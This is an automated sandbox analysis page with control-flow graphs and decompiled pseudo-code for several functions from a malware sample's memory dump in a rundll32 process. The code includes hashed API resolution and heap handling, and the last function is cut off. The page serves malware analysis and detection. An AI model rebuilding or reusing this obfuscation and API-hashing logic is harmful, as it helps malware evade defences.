                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: dfb2634da5e58c25371bcb61734d2be7c2c63e119a504b9d24ca683d9490e512
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: ADE01A5270336041FF6C5A6AC59D36B22A0ABC5F4CF785839CD4A4B3E7CE18E8A7C211
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00000201A29A6DF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 303memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 291 201a29a6df0-201a29a6e42 call 201a29a91c8 294 201a29a7239 291->294 295 201a29a6e48-201a29a6e6b 291->295 296 201a29a723e-201a29a7257 294->296 297 201a29a703b 295->297 298 201a29a6e71-201a29a6e86 call 201a29a908c 295->298 300 201a29a7040-201a29a7055 HeapFree 297->300 303 201a29a6e8f 298->303 304 201a29a6e88-201a29a6e8d 298->304 300->296 302 201a29a705b-201a29a707b call 201a29a91c8 300->302 302->294 311 201a29a7081-201a29a709e call 201a29a672c 302->311 306 201a29a6e91-201a29a6eae HeapAlloc 303->306 304->306 309 201a29a722f-201a29a7234 306->309 310 201a29a6eb4-201a29a6ecc call 201a29a47b0 306->310 309->300 316 201a29a6ed0-201a29a6ed4 310->316 317 201a29a70a0-201a29a70a2 311->317 318 201a29a70a8-201a29a70cb call 201a29a91c8 311->318 320 201a29a6edc-201a29a6edf 316->320 321 201a29a6ed6-201a29a6eda 316->321 317->294 317->318 324 201a29a70d1-201a29a7100 call 201a29a908c 318->324 325 201a29a7166-201a29a7189 call 201a29a91c8 318->325 320->316 321->320 323 201a29a6ee1-201a29a6ee5 321->323 326 201a29a6eeb-201a29a6efa call 201a29a908c 323->326 327 201a29a6f74 323->327 338 201a29a7109-201a29a711e call 201a29a47b0 324->338 339 201a29a7102 324->339 325->296 340 201a29a718f-201a29a71a5 call 201a29a672c 325->340 336 201a29a6efc-201a29a6f01 326->336 337 201a29a6f03 326->337 330 201a29a6f76 327->330 335 201a29a6f7e-201a29a6f80 330->335 341 201a29a7021-201a29a7033 HeapFree 335->341 342 201a29a6f86-201a29a6f9f call 201a29a908c 335->342 343 201a29a6f05-201a29a6f25 HeapAlloc 336->343 337->343 356 201a29a7120-201a29a712f call 201a29a487a 338->356 357 201a29a7134-201a29a7145 call 201a29a908c 338->357 339->338 340->296 353 201a29a71ab-201a29a71b4 340->353 341->297 354 201a29a6fa1 342->354 355 201a29a6fa8-201a29a6fc5 342->355 343->330 348 201a29a6f27 343->348 352 201a29a6f2a-201a29a6f32 348->352 358 201a29a6f34-201a29a6f37 352->358 359 201a29a6f46 352->359 353->296 360 201a29a71ba-201a29a71d5 call 201a29a908c 353->360 354->355 362 201a29a6fcb-201a29a6fe1 call 201a29a908c 355->362 363 201a29a6fc7 355->363 356->357 375 201a29a714e-201a29a715e HeapFree 357->375 376 201a29a7147 357->376 365 201a29a6f39-201a29a6f40 358->365 366 201a29a6f42-201a29a6f44 358->366 368 201a29a6f48-201a29a6f4b 359->368 380 201a29a71de-201a29a71ef call 201a29a908c 360->380 381 201a29a71d7 360->381 377 201a29a6fea-201a29a6fed 362->377 378 201a29a6fe3 362->378 363->362 365->358 365->366 366->359 366->368 372 201a29a6f4d-201a29a6f50 368->372 373 201a29a6f62-201a29a6f70 368->373 382 201a29a6f53-201a29a6f56 372->382 373->352 379 201a29a6f72 373->379 375->325 376->375 383 201a29a6fef-201a29a700a HeapFree * 2 377->383 384 201a29a7010-201a29a701f 377->384 378->377 379->335 389 201a29a71f1 380->389 390 201a29a71f8-201a29a7224 call 201a29a908c 380->390 381->380 386 201a29a6f5d-201a29a6f60 382->386 387 201a29a6f58-201a29a6f5b 382->387 383->384 384->300 386->382 387->373 387->386 389->390 390->296 393 201a29a7226-201a29a722d 390->393 393->296
                                C-Code - Quality: 39%
                                			E00000201201A29A6DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t96;
				void* _t116;
				void* _t121;
				intOrPtr _t123;
				void* _t130;
				char _t131;
				void* _t156;
				long long* _t198;
				long long* _t199;
				long long* _t201;
				char* _t218;
				char* _t219;
				long _t252;
				intOrPtr* _t253;
				long _t255;
				void* _t260;
				char* _t262;
				long long _t263;
				signed long long _t269;
				void* _t271;
				void* _t272;
				void* _t292;
				void* _t293;
				long _t300;
				long _t305;
				void* _t307;

				_t292 = _t271;
				 *((long long*)(_t292 + 8)) = __rbx;
				 *((long long*)(_t292 + 0x10)) = __rdx;
				_t272 = _t271 - 0x40;
				r14d =  *0xa29ad450;
				_t253 = __rcx;
				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0xa29ad458 + 8));
				if (E00000201201A29A91C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0xa29ad458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0xa29a7239;
				_t198 =  *_t253;
				 *((long long*)(_t272 + 0x98)) = _t198;
				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0xa29ad458 + 8));
				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0xa29a703b;
				r13d = 0xfb849f8f;
				E00000201201A29A908C(r13d, _t198,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t198 == 0) goto 0xa29a6e8f;
				 *_t198();
				goto 0xa29a6e91;
				r8d = 1;
				HeapAlloc(_t307, _t305, _t300);
				 *((long long*)(_t272 + 0x28)) = _t198;
				if (_t198 == 0) goto 0xa29a722f;
				0xa29a47b0();
				_t262 = _t198;
				if ( *_t262 == 0x20) goto 0xa29a6edc;
				if ( *_t262 != 9) goto 0xa29a6ee1;
				_t263 = _t262 + 1;
				goto 0xa29a6ed0;
				if ( *_t263 == 0) goto 0xa29a6f74;
				E00000201201A29A908C(r13d, _t198,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t198 == 0) goto 0xa29a6f03;
				 *_t198();
				goto 0xa29a6f05;
				asm("cdq");
				_t15 = _t198 + 1; // 0x1
				r8d = _t15;
				HeapAlloc(_t293, _t252, _t255);
				if (_t198 == 0) goto 0xa29a6f76;
				_t130 =  *_t263;
				if (_t130 == 0) goto 0xa29a6f46;
				if (_t130 == 0x20) goto 0xa29a6f42;
				_t218 = _t263 + 1;
				_t131 =  *_t218;
				if (_t131 != 0) goto 0xa29a6f34;
				if (_t131 != 0) goto 0xa29a6f48;
				if (_t218 == 0) goto 0xa29a6f62;
				 *_t218 = 0;
				_t219 = _t218 + 1;
				if ( *_t219 == 0x20) goto 0xa29a6f5d;
				if ( *_t219 != 9) goto 0xa29a6f62;
				goto 0xa29a6f53;
				 *_t198 = _t263;
				_t199 = _t198 +  *((intOrPtr*)( *0xa29ad458 + 8));
				if (_t219 + 1 != 0) goto 0xa29a6f2a;
				goto 0xa29a6f7e;
				if (0 == 0) goto 0xa29a7021;
				E00000201201A29A908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t199 == 0) goto 0xa29a6fa8;
				 *_t199();
				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
				 *((intOrPtr*)(_t253 + 0x50)) = sil;
				if ( *((char*)(_t253 + 0x70)) == 0) goto 0xa29a6fcb;
				 *((char*)(_t253 + 0x70)) = 0;
				asm("lock and dword [edi+0x2c], 0xfffffffe");
				E00000201201A29A908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t199 == 0) goto 0xa29a6fea;
				 *_t199();
				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0xa29a7010;
				HeapFree(_t260, ??);
				HeapFree(??, ??, ??);
				goto 0xa29a7040;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0xa29a723e;
				if (E00000201201A29A91C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xa29a7239;
				_t96 = E00000201201A29A672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
				_t123 =  *((intOrPtr*)(_t272 + 0x98));
				if (_t96 != 0) goto 0xa29a70a8;
				if (_t123 == 0) goto 0xa29a7239;
				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
				if (E00000201201A29A91C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xa29a7166;
				_t46 = _t199 + 0x10; // 0x10
				_t116 = _t46;
				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
				E00000201201A29A908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t199 == 0) goto 0xa29a7109;
				 *_t199();
				r8d = _t156;
				0xa29a47b0();
				if (_t156 - _t116 >= 0) goto 0xa29a7134;
				r8d = _t116 - _t156;
				E00000201201A29A487A();
				E00000201201A29A908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t199 == 0) goto 0xa29a714e;
				 *_t199();
				HeapFree(??, ??, ??);
				_t269 =  *((intOrPtr*)(_t272 + 0x88));
				r14d = r14d ^ 0x1a1a0866;
				if (E00000201201A29A91C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xa29a723e;
				if (E00000201201A29A672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0xa29a723e;
				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0xa29a723e;
				E00000201201A29A908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t199 == 0) goto 0xa29a71de;
				 *_t199();
				E00000201201A29A908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t199 == 0) goto 0xa29a71f8;
				 *_t199();
				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
				 *((long long*)(_t272 + 0x28)) = _t201;
				 *((long long*)(_t253 + 0x30)) = _t201;
				E00000201201A29A908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t201 == 0) goto 0xa29a723e;
				 *_t201();
				goto 0xa29a723e;
				goto 0xa29a7040;
				return 1;
			}
































                                0x201a29a6df0
                                0x201a29a6df3
                                0x201a29a6df7
                                0x201a29a6e06
                                0x201a29a6e11
                                0x201a29a6e22
                                0x201a29a6e36
                                0x201a29a6e42
                                0x201a29a6e54
                                0x201a29a6e5b
                                0x201a29a6e63
                                0x201a29a6e6b
                                0x201a29a6e75
                                0x201a29a6e7e
                                0x201a29a6e86
                                0x201a29a6e8b
                                0x201a29a6e8d
                                0x201a29a6e98
                                0x201a29a6e9d
                                0x201a29a6ea6
                                0x201a29a6eae
                                0x201a29a6ebd
                                0x201a29a6ec9
                                0x201a29a6ed4
                                0x201a29a6eda
                                0x201a29a6edc
                                0x201a29a6edf
                                0x201a29a6ee5
                                0x201a29a6ef2
                                0x201a29a6efa
                                0x201a29a6eff
                                0x201a29a6f01
                                0x201a29a6f05
                                0x201a29a6f0f
                                0x201a29a6f0f
                                0x201a29a6f17
                                0x201a29a6f25
                                0x201a29a6f2a
                                0x201a29a6f32
                                0x201a29a6f37
                                0x201a29a6f39
                                0x201a29a6f3c
                                0x201a29a6f40
                                0x201a29a6f44
                                0x201a29a6f4b
                                0x201a29a6f4d
                                0x201a29a6f50
                                0x201a29a6f56
                                0x201a29a6f5b
                                0x201a29a6f60
                                0x201a29a6f62
                                0x201a29a6f67
                                0x201a29a6f70
                                0x201a29a6f72
                                0x201a29a6f80
                                0x201a29a6f8f
                                0x201a29a6f9f
                                0x201a29a6fa6
                                0x201a29a6fb5
                                0x201a29a6fb9
                                0x201a29a6fbd
                                0x201a29a6fc5
                                0x201a29a6fc7
                                0x201a29a6fcb
                                0x201a29a6fd9
                                0x201a29a6fe1
                                0x201a29a6fe8
                                0x201a29a6fed
                                0x201a29a6ffc
                                0x201a29a700a
                                0x201a29a701f
                                0x201a29a702d
                                0x201a29a704d
                                0x201a29a7055
                                0x201a29a707b
                                0x201a29a7090
                                0x201a29a7095
                                0x201a29a709e
                                0x201a29a70a2
                                0x201a29a70ab
                                0x201a29a70cb
                                0x201a29a70db
                                0x201a29a70db
                                0x201a29a70eb
                                0x201a29a70f8
                                0x201a29a7100
                                0x201a29a7107
                                0x201a29a7112
                                0x201a29a7117
                                0x201a29a711e
                                0x201a29a712c
                                0x201a29a712f
                                0x201a29a713d
                                0x201a29a7145
                                0x201a29a714c
                                0x201a29a7158
                                0x201a29a715e
                                0x201a29a7166
                                0x201a29a7189
                                0x201a29a71a5
                                0x201a29a71b4
                                0x201a29a71cd
                                0x201a29a71d5
                                0x201a29a71dc
                                0x201a29a71e7
                                0x201a29a71ef
                                0x201a29a71f6
                                0x201a29a720c
                                0x201a29a720f
                                0x201a29a7214
                                0x201a29a721c
                                0x201a29a7224
                                0x201a29a722b
                                0x201a29a722d
                                0x201a29a7234
                                0x201a29a7257

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: da058dc003b01b156ea4b8d410fcc0e5859ce17c396af372752feff27be8cd4b
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 0AC18222306BA085FF68DB6AA44939B67A0F788F88F694025DE4D47797DF38C467C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A5638 Relevance: 11.5, APIs: 9, Instructions: 252memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 395 201a29a5638-201a29a5687 call 201a29a908c 398 201a29a5689-201a29a568c 395->398 399 201a29a5691-201a29a56a2 call 201a29a908c 395->399 398->399 402 201a29a56ab-201a29a56eb call 201a29a5ba4 call 201a29a13ec 399->402 403 201a29a56a4 399->403 408 201a29a59e0-201a29a59f9 402->408 409 201a29a56f1-201a29a5706 call 201a29a908c 402->409 403->402 412 201a29a5711 409->412 413 201a29a5708-201a29a570f 409->413 414 201a29a5713-201a29a5722 call 201a29a908c 412->414 413->414 418 201a29a572e 414->418 419 201a29a5724-201a29a572c 414->419 420 201a29a5731-201a29a5747 HeapAlloc 418->420 419->420 422 201a29a574d-201a29a576b call 201a29a47b0 420->422 423 201a29a59d2-201a29a59da HeapFree 420->423 426 201a29a576d-201a29a5774 422->426 427 201a29a57a3-201a29a57ba call 201a29aa238 422->427 423->408 426->427 428 201a29a5776-201a29a579e call 201a29a47b0 * 2 426->428 432 201a29a57c0-201a29a57e1 call 201a29a908c 427->432 433 201a29a59c4-201a29a59cc HeapFree 427->433 428->427 438 201a29a57ea 432->438 439 201a29a57e3-201a29a57e8 432->439 433->423 440 201a29a57ec-201a29a580b HeapAlloc 438->440 439->440 442 201a29a5811-201a29a584c call 201a29a5ba4 call 201a29a13ec 440->442 443 201a29a59b6 440->443 449 201a29a5852-201a29a5893 call 201a29ab158 HeapFree 442->449 450 201a29a59a8-201a29a59b0 HeapFree 442->450 444 201a29a59b9-201a29a59be HeapFree 443->444 444->433 453 201a29a5899-201a29a58a2 449->453 454 201a29a59fa-201a29a59ff 449->454 450->443 453->454 455 201a29a58a8-201a29a58c7 call 201a29a7cf4 453->455 454->433 455->450 458 201a29a58cd-201a29a58ee HeapAlloc 455->458 459 201a29a59a3 458->459 460 201a29a58f4-201a29a5931 call 201a29a5ba4 call 201a29a13ec 458->460 459->450 465 201a29a5933-201a29a5993 call 201a29ab158 * 2 460->465 466 201a29a5995-201a29a599d HeapFree 460->466 465->444 466->459
                                C-Code - Quality: 15%
                                			E00000201201A29A5638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
				void* __rbp;
				signed long long _t89;
				signed long long _t109;
				signed long long _t122;
				signed long long _t131;
				intOrPtr _t141;
				void* _t167;
				void* _t186;
				long long* _t187;
				long long _t188;
				long long _t190;
				long long _t192;
				long long* _t193;
				long long* _t234;
				long _t237;
				long _t240;
				void* _t243;
				void* _t248;
				void* _t249;
				void* _t264;
				void* _t269;
				void* _t270;
				long _t273;
				long _t277;
				void* _t281;

				_t269 = __r11;
				_t192 = __rbx;
				_t186 = _t248;
				 *((long long*)(_t186 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
				 *((long long*)(_t186 + 0x18)) = __r8;
				 *((long long*)(_t186 + 8)) = __rcx;
				_t249 = _t248 - 0x50;
				_t244 =  *0xa29ad458;
				_t187 =  *0xa29ad448;
				 *((long long*)(_t249 + 0x38)) = _t187;
				E00000201201A29A908C(0x38e683e4, _t187,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t187 == _t237) goto 0xa29a5691;
				_t9 = _t237 + 0xa; // 0xa
				 *_t187();
				E00000201201A29A908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t187 == _t237) goto 0xa29a56ab;
				 *_t187();
				_t12 = _t249 + 0x30; // -126
				_t89 = E00000201201A29A5BA4(_t12);
				_t13 = _t249 + 0x30; // -126
				r11d = _t89;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t18 = _t269 + 3; // 0x3
				E00000201201A29A13EC(_t18, _t187, __rbx, _t13);
				 *((long long*)(_t249 + 0x40)) = _t187;
				if (_t187 == _t237) goto 0xa29a59e0;
				r12d = 0xfb849f8f;
				E00000201201A29A908C(r12d, _t187,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t187 == _t237) goto 0xa29a5711;
				 *_t187();
				goto 0xa29a5713;
				E00000201201A29A908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
				if (_t187 == _t237) goto 0xa29a572e;
				r13d =  *_t187();
				goto 0xa29a5731;
				r13d = 0;
				_t23 = _t192 + 7; // 0x7
				r8d = _t273 + _t23;
				HeapAlloc(_t281, _t277, _t273);
				if (_t187 == _t237) goto 0xa29a59d2;
				_t24 = _t192 + 1; // 0x1
				r8d = _t24;
				0xa29a47b0();
				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xa29a57a3;
				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0xa29a57a3;
				_t188 =  *((intOrPtr*)(_t249 + 0x38));
				r8d = 6;
				0xa29a47b0();
				_t32 = _t273 + 1; // 0x1
				r8d = _t32;
				0xa29a47b0();
				_t234 = _t187;
				if (E00000201201A29AA238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0xa29a59c4;
				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
				E00000201201A29A908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
				if (_t188 == _t237) goto 0xa29a57ea;
				 *_t188();
				goto 0xa29a57ec;
				 *((intOrPtr*)(_t193 + 0x10)) = 0;
				_t41 = _t234 + 0x34; // 0x34
				r8d = _t41;
				 *((intOrPtr*)(_t193 + 0x14)) = 1;
				HeapAlloc(_t270, _t237, _t240);
				if (_t188 == _t237) goto 0xa29a59b6;
				_t43 = _t249 + 0x30; // 0xfb849fcf
				_t109 = E00000201201A29A5BA4(_t43);
				_t44 = _t249 + 0x30; // 0xfb849fcf
				r11d = _t109;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t49 = _t269 + 3; // 0x3
				E00000201201A29A13EC(_t49, _t188, _t193, _t44);
				if (_t188 == _t237) goto 0xa29a59a8;
				0xa29ab158();
				HeapFree(_t243, ??);
				 *((long long*)(_t193 + 8)) = _t188;
				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xa29a59fa;
				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
				if (_t141 == 0) goto 0xa29a59fa;
				r8d = _t141;
				_t190 = _t193 + 0x28;
				 *((long long*)(_t249 + 0x20)) = _t190;
				if (E00000201201A29A7CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0xa29a59a8;
				r15d = 0x77;
				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
				HeapAlloc(??, ??, ??);
				if (_t190 == _t237) goto 0xa29a59a3;
				_t62 = _t249 + 0x30; // 0xfb849fcf
				_t122 = E00000201201A29A5BA4(_t62);
				_t63 = _t249 + 0x30; // 0xfb849fcf
				r11d = _t122;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t68 = _t269 + 3; // 0x3
				_t131 = E00000201201A29A13EC(_t68, _t190, _t193, _t63);
				 *((long long*)(_t249 + 0x48)) = _t190;
				if (_t190 == _t237) goto 0xa29a5995;
				0xa29ab158();
				r11d = _t131;
				r15d = r15d - r11d;
				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x201a29b129f;
				0xa29ab158();
				 *((long long*)(_t193 + 0x20)) = _t190;
				goto 0xa29a59b9;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return 2;
			}




























                                0x201a29a5638
                                0x201a29a5638
                                0x201a29a5638
                                0x201a29a563b
                                0x201a29a563f
                                0x201a29a5643
                                0x201a29a5647
                                0x201a29a5656
                                0x201a29a565a
                                0x201a29a5661
                                0x201a29a5678
                                0x201a29a567f
                                0x201a29a5687
                                0x201a29a568c
                                0x201a29a568f
                                0x201a29a569a
                                0x201a29a56a2
                                0x201a29a56a9
                                0x201a29a56ab
                                0x201a29a56b0
                                0x201a29a56b5
                                0x201a29a56ba
                                0x201a29a56d4
                                0x201a29a56d7
                                0x201a29a56db
                                0x201a29a56e3
                                0x201a29a56eb
                                0x201a29a56f5
                                0x201a29a56fe
                                0x201a29a5706
                                0x201a29a570b
                                0x201a29a570f
                                0x201a29a571a
                                0x201a29a5722
                                0x201a29a5729
                                0x201a29a572c
                                0x201a29a572e
                                0x201a29a5731
                                0x201a29a5731
                                0x201a29a573b
                                0x201a29a5747
                                0x201a29a574d
                                0x201a29a574d
                                0x201a29a5757
                                0x201a29a576b
                                0x201a29a5774
                                0x201a29a5776
                                0x201a29a577b
                                0x201a29a578d
                                0x201a29a5792
                                0x201a29a5792
                                0x201a29a579e
                                0x201a29a57b0
                                0x201a29a57ba
                                0x201a29a57c0
                                0x201a29a57d2
                                0x201a29a57d9
                                0x201a29a57e1
                                0x201a29a57e6
                                0x201a29a57e8
                                0x201a29a57f1
                                0x201a29a57f4
                                0x201a29a57f4
                                0x201a29a57f8
                                0x201a29a57ff
                                0x201a29a580b
                                0x201a29a5811
                                0x201a29a5816
                                0x201a29a581b
                                0x201a29a5820
                                0x201a29a583a
                                0x201a29a583d
                                0x201a29a5841
                                0x201a29a584c
                                0x201a29a5871
                                0x201a29a587e
                                0x201a29a588c
                                0x201a29a5893
                                0x201a29a5899
                                0x201a29a58a2
                                0x201a29a58a8
                                0x201a29a58b3
                                0x201a29a58bb
                                0x201a29a58c7
                                0x201a29a58cd
                                0x201a29a58db
                                0x201a29a58e2
                                0x201a29a58ee
                                0x201a29a58f4
                                0x201a29a58f9
                                0x201a29a58fe
                                0x201a29a5903
                                0x201a29a591d
                                0x201a29a5920
                                0x201a29a5924
                                0x201a29a5929
                                0x201a29a5931
                                0x201a29a5950
                                0x201a29a595d
                                0x201a29a5968
                                0x201a29a5970
                                0x201a29a5980
                                0x201a29a598a
                                0x201a29a5993
                                0x201a29a599d
                                0x201a29a59b0
                                0x201a29a59be
                                0x201a29a59cc
                                0x201a29a59da
                                0x201a29a59f9

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: 359d1d6ae4aa86e2ddbd4c01b89cf8cf3333b2fcec665d603a99428615ad58d8
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: F5A1B466312BA086EF18DB2AE40929B67A1F7C8FC8F644111EE4E47B56DF38C567C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A7FD4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 170memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 542 201a29a7fd4-201a29a8011 543 201a29a80ef-201a29a80f6 542->543 544 201a29a8017-201a29a801c 542->544 545 201a29a814a 543->545 546 201a29a80f8-201a29a8109 call 201a29a908c 543->546 547 201a29a8022-201a29a8027 544->547 548 201a29a8115-201a29a8118 544->548 554 201a29a814f-201a29a8152 545->554 562 201a29a810b-201a29a8113 546->562 563 201a29a8139 546->563 550 201a29a80e9 547->550 551 201a29a802d-201a29a8032 547->551 552 201a29a811a-201a29a811d 548->552 553 201a29a80bf-201a29a80c4 548->553 550->543 556 201a29a81c8-201a29a81cf 551->556 557 201a29a8038-201a29a803d 551->557 558 201a29a8120 call 201a29a85cc 552->558 559 201a29a821b-201a29a8224 553->559 554->559 560 201a29a8158-201a29a815e 554->560 568 201a29a81fb 556->568 569 201a29a81d1-201a29a81f9 call 201a29a2874 HeapFree 556->569 561 201a29a8164-201a29a816c 557->561 566 201a29a8043-201a29a8048 557->566 567 201a29a8125-201a29a812b 558->567 564 201a29a8241-201a29a825b 559->564 565 201a29a8226-201a29a822c 559->565 560->559 560->561 570 201a29a81be-201a29a81c6 561->570 571 201a29a816e-201a29a8171 561->571 578 201a29a813e-201a29a8148 562->578 563->578 565->564 573 201a29a822e-201a29a8239 565->573 574 201a29a80c9-201a29a80da call 201a29a908c 566->574 575 201a29a804a-201a29a804f 566->575 576 201a29a812d-201a29a8134 567->576 577 201a29a80b5-201a29a80ba 567->577 572 201a29a8200-201a29a8203 568->572 569->572 570->556 570->559 571->570 581 201a29a8173-201a29a818f call 201a29a487a 571->581 572->559 582 201a29a8205-201a29a8212 572->582 584 201a29a823c call 201a29a6ac0 573->584 597 201a29a80dc 574->597 598 201a29a80e2-201a29a80e4 574->598 586 201a29a805b-201a29a805e 575->586 587 201a29a8051-201a29a8056 575->587 588 201a29a807a-201a29a808a 576->588 577->559 578->554 602 201a29a8192 call 201a29a5448 581->602 591 201a29a8214 call 201a29a9214 582->591 584->564 586->553 593 201a29a8060-201a29a8063 586->593 587->559 589 201a29a808d call 201a29a14b8 588->589 594 201a29a8092-201a29a8096 589->594 596 201a29a8219 591->596 599 201a29a8066 call 201a29a85cc 593->599 600 201a29a80a2-201a29a80b0 HeapFree 594->600 601 201a29a8098-201a29a809d 594->601 596->559 597->598 598->559 603 201a29a806b-201a29a8071 599->603 600->559 601->559 605 201a29a8197-201a29a8199 602->605 603->577 604 201a29a8073 603->604 604->588 606 201a29a819b-201a29a81ac call 201a29a672c 605->606 607 201a29a81bc 605->607 606->570 610 201a29a81ae-201a29a81b7 606->610 607->570 610->607
                                C-Code - Quality: 46%
                                			E00000201201A29A7FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
				void* __rdi;
				signed int _t34;
				void* _t66;
				char* _t104;
